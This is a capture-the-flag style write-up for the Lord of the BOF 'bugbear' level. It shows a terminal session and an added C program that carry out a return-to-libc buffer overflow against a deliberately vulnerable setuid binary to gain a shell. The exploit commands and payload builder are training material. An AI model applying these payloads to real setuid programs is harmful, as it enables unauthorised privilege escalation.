
Heh heh

Feels good to have solved the RTL level. I wandered around a bit at first, but it worked out, so I'm happy!

login: darkknight

Password:

Last login: Sun Mar 16 07:20:14 from 192.168.10.1

[darkknight@localhost darkknight]$ ls -al

total 44

drwx------    2 darkknig darkknig     4096 Mar 29  2010 .

drwxr-xr-x   25 root     root         4096 Mar 30  2010 ..

-rw-r--r--    1 darkknig darkknig       24 Mar  2  2010 .bash_logout

-rw-r--r--    1 darkknig darkknig      230 Mar  2  2010 .bash_profile

-rw-r--r--    1 darkknig darkknig      124 Mar  2  2010 .bashrc

-rwxr-xr-x    1 darkknig darkknig      333 Mar  2  2010 .emacs

-rw-r--r--    1 darkknig darkknig     3394 Mar  2  2010 .screenrc

-rwsr-sr-x    1 bugbear  bugbear     12043 Mar  8  2010 bugbear

-rw-r--r--    1 root     root          385 Mar 29  2010 bugbear.c

[darkknight@localhost darkknight]$ cat bugbear.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - bugbear

        - RTL1

*/


#include <stdio.h>

#include <stdlib.h>


main(int argc, char *argv[])

{

        char buffer[40];

        int i;


        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }


        if(argv[1][47] == '\xbf') // from this level on, 0xbf... (stack) addresses can't be used at all

        {

                printf("stack betrayed you!!\n");

                exit(0);

        }


        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);

}

[darkknight@localhost darkknight]$ cp bugbear bugbeer

[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x48'`



Segmentation fault (core dumped)

[darkknight@localhost darkknight]$ gdb -q bugbeer core

Core was generated by `./bugbeer '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0x90909090 in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048436

(gdb) r

Starting program: /home/darkknight/bugbeer


Breakpoint 1, 0x8048436 in main ()

(gdb) p system

$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

(gdb) q

The program is running.  Exit anyway? (y or n) y

[darkknight@localhost darkknight]$ payload= nopx44, system, dummy, argument

bash: nopx44,: command not found

[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "BBBB"'`

@AAAABBBB

Segmentation fault (core dumped)

[darkknight@localhost darkknight]$ export ARG=`perl -e 'print "\x90"x10, "/bin/sh"'`

[darkknight@localhost darkknight]$ ./env ARG

ARG: 0xbffffc9d

[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9d\xfc\xff\xbf"'`

@AAAAü ¿

sh: /bin/sh: No such file or directory

Segmentation fault (core dumped)

[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9e\xfc\xff\xbf"'`

@AAAAžü ¿

sh: /bin/sh: No such file or directory

Segmentation fault (core dumped) // did a liiittle bit of guessing.. heh

[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9f\xfc\xff\xbf"'`

@AAAAŸü ¿

bash$ exit

exit

Segmentation fault (core dumped)

[darkknight@localhost darkknight]$ ./bugbear `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9f\xfc\xff\xbf"'`

@AAAAŸü ¿

bash$ my-pass

euid = 513


Woooahhh haha
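An added example, not code from the original post: a small C program that builds the same frame the perl one-liner above does (44 bytes of filler over buffer[40] and the saved EBP, then &system, then the 4 bytes system() will return to, then a pointer to "/bin/sh"), checks it against the two things that can sink it on this level (the argv[1][47] == 0xbf filter and a NUL byte cutting strcpy short), and models what system() actually receives when its argument points into an environment string. The addresses are the ones read off the box in the transcript (system at 0x40058ae0, "/bin/sh" at 0xbffffc9f) and are assumptions anywhere else.

```c
/*
 * Added example (not from the original post): build and sanity-check the
 * return-to-libc frame used against bugbear, and show why the 0x90 "sled"
 * in front of "/bin/sh" in the environment did not help.
 *
 * Assumptions: the addresses below are the ones read off the post's box
 * (system at 0x40058ae0, "/bin/sh" at 0xbffffc9f); any other machine
 * needs its own values from gdb and an env-address helper.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE    40                  /* char buffer[40] in bugbear.c              */
#define RET_OFFSET  (BUF_SIZE + 4)      /* 40 bytes of buffer + 4 bytes of saved EBP */
#define SYSTEM_ADDR 0x40058ae0u         /* (gdb) p system on the post's box          */
#define BINSH_ADDR  0xbffffc9fu         /* address of "/bin/sh" that finally worked  */

/* x86 is little-endian: 0x40058ae0 is written as e0 8a 05 40. */
static void put_le32(uint8_t *dst, uint32_t v)
{
    dst[0] = (uint8_t)(v);
    dst[1] = (uint8_t)(v >> 8);
    dst[2] = (uint8_t)(v >> 16);
    dst[3] = (uint8_t)(v >> 24);
}

/*
 * Layout after the overflow, as seen by system() once main() returns into it:
 *   [filler x ret_off][&system][address system() returns to][pointer to "/bin/sh"]
 * The four bytes after &system are where system() "ret"s when the shell exits;
 * "AAAA" is fine here (the trailing Segmentation fault in the transcript is
 * exactly that return). Returns the payload length.
 */
size_t build_rtl_payload(uint8_t *out, size_t ret_off, uint32_t func,
                         uint32_t ret_after, uint32_t arg)
{
    memset(out, 0x90, ret_off);         /* any non-NUL filler works; 0x90 mirrors the post */
    put_le32(out + ret_off,     func);
    put_le32(out + ret_off + 4, ret_after);
    put_le32(out + ret_off + 8, arg);
    return ret_off + 12;
}

/* bugbear's check: argv[1][47] == '\xbf' aborts. Byte 47 is the most
 * significant byte of the overwritten return address, so any return into
 * the stack (0xbfXXXXXX) is refused, while a libc address (0x40XXXXXX) passes. */
int passes_bugbear_filter(const uint8_t *p, size_t len)
{
    return len > 47 && p[47] != 0xbf;
}

/* strcpy() stops at the first NUL, so an address containing a 0x00 byte
 * (or an argument of 0) truncates the frame before it is fully written. */
int survives_strcpy(const uint8_t *p, size_t len)
{
    return memchr(p, 0, len) == NULL;
}

/* system(s) runs "sh -c s": the argument pointer must land on the start of a
 * command the shell accepts. This is the string the shell sees when the
 * pointer lands `skip` bytes into an environment value. */
const char *command_seen_by_system(const char *env_value, size_t skip)
{
    return env_value + skip;
}

/* Linux treats repeated slashes as one, so "////bin/sh" and "/bin/sh" name the
 * same file; 0x90 bytes, by contrast, become part of the command name. */
int resolves_to_path(const char *cmd, const char *want)
{
    char norm[256];
    size_t j = 0;
    for (size_t i = 0; cmd[i] != '\0' && j + 1 < sizeof norm; i++) {
        if (cmd[i] == '/' && j > 0 && norm[j - 1] == '/')
            continue;
        norm[j++] = cmd[i];
    }
    norm[j] = '\0';
    return strcmp(norm, want) == 0;
}

int main(void)
{
    uint8_t payload[RET_OFFSET + 12];
    size_t n = build_rtl_payload(payload, RET_OFFSET, SYSTEM_ADDR, 0x41414141u, BINSH_ADDR);

    if (!passes_bugbear_filter(payload, n) || !survives_strcpy(payload, n)) {
        fprintf(stderr, "payload would be rejected or truncated\n");
        return 1;
    }
    /* Raw bytes on stdout, usable as: ./bugbear "$(./rtl_payload)" */
    fwrite(payload, 1, n, stdout);
    return 0;
}
```

The last two functions are the explanation for the guessing at the end of the transcript: system() hands its argument to sh -c, so a pointer that lands on the 0x90 bytes in front of "/bin/sh" makes the shell look for a command whose name starts with those bytes (that is the "No such file or directory" message; the terminal simply did not render the 0x90 bytes). A NOP sled only buys slack when the bytes are executed, not when they are parsed. A run of leading slashes ("////////bin/sh") gives the same tolerance for system(), since Linux treats repeated slashes as one, so any address inside the run works.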
